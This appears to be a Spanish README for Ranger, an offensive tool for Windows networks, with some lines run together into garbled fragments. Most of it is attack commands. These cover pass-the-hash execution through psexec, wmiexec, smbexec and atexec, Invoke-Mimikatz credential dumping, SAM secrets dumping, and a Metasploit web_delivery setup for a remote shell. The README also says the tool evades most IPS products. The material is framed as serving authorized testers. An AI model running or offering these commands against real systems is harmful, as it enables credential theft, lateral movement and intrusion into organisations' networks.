
Una herramienta para profesionales de seguridad para acceder e interactuar con sistemas remotos basados en Microsoft Windows.
Una herramienta para ayudar a los profesionales de seguridad a acceder e interactuar con sistemas remotos basados en Microsoft Windows.
Este proyecto fue conceptualizado con el pensamiento de que no inventamos el arco ni la flecha, solo una forma más eficiente de usarlos.
Ranger es una herramienta de ataque y pruebas de penetración basada en línea de comandos, que tiene la capacidad de utilizar un servidor catapulta instanciado para entregar capacidades contra sistemas Windows. Mientras un usuario disponga de un conjunto de credenciales o un conjunto de hashes (NTLM, LM, LM:NTLM), puede obtener acceso a sistemas que forman parte de la confianza.
Usando esta capacidad, un profesional de seguridad puede extraer credenciales de la memoria en texto claro, acceder a tablas SAM, ejecutar comandos, scripts de PowerShell, binarios de Windows y otras herramientas. Actualmente, la herramienta evita la mayoría de las soluciones de proveedores de IPS a menos que hayan sido ajustadas específicamente para detectarla. La herramienta fue desarrollada utilizando nuestros laboratorios domésticos con el objetivo de apoyar a los profesionales de seguridad en actividades legalmente y/o contractualmente respaldadas.
Se está agregando más funcionalidad, pero por ahora la herramienta utiliza las contribuciones de la comunidad de repositorios relacionados con los equipos de PowerShell PowerView, PowerShell Mimikatz e Impacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
ranger.py --invoker -q -v -vv -vvv
ranger.py --downloader -q -v -vv -vvv
ranger.py --executor -q -v -vv -vvv
--get-domain-membership--domain opcional, que te permite apuntar a un dominio diferente al que iniciaste sesiónranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
-d, se interpretará que deseas ignorar todos los nombres de dominio del archivo.password
LM:NTLM
:NTLM
PWDUMP
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xmlt en los comandos por e.-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml-f.-a.-f como -a si deseas cambiar el comando; para evitar usar -a, puedes usar Executor.-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x.-f.-a si la herramienta lo requiere.-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"use exploit/multi/script/web_delivery
set targets 2
set payload <elige el payload deseado>
set lhost <tu IP>
set lport <puerto para el shell, asegúrate de que no sea un puerto conflictivo>
set URIPATH /
set SRVPORT <el mismo que el configurado por la opción -r en ranger, por defecto 8888>
exploit -j
Estoy recibiendo errores de acceso denegado en máquinas Windows que forman parte de un GRUPO DE TRABAJO.
Cuando no se forma parte de un dominio, Windows por defecto no tiene recursos compartidos administrativos. SMBEXEC depende de que los recursos compartidos estén habilitados. Además, WMIC no está habilitado en máquinas de GRUPO DE TRABAJO. SMBEXEC y WMIEXEC están diseñados para apuntar a protocolos habilitados en sistemas de dominio. Si bien es posible habilitar estas funciones en un sistema de GRUPO DE TRABAJO, ten en cuenta que estás introduciendo protocolos vulnerables (después de todo, para eso está hecha esta herramienta). Habilitar estas características en tu sistema doméstico principal que tu pareja usa para Facebook probablemente no sea la mejor idea.
enum4linux y luego usar el argumento --share share_name en ranger para intentar ejecutar SMBEXEC.https://pypi.python.org/pypi/colorama[BSides Charm City 2016: 23 de abril de 2016] (http://2016.bsidescharm.com/2016-talks/ranger-it-just-takes-one-account-to-take-down-an-enterprise)
[Video] (https://youtu.be/HrXTrPzdR2Q?list=PL0YXeUocWA4NAGPmYdKNmQEh8H6iL_4Ik)
[Black Arch Linux] (https://blackarch.org/)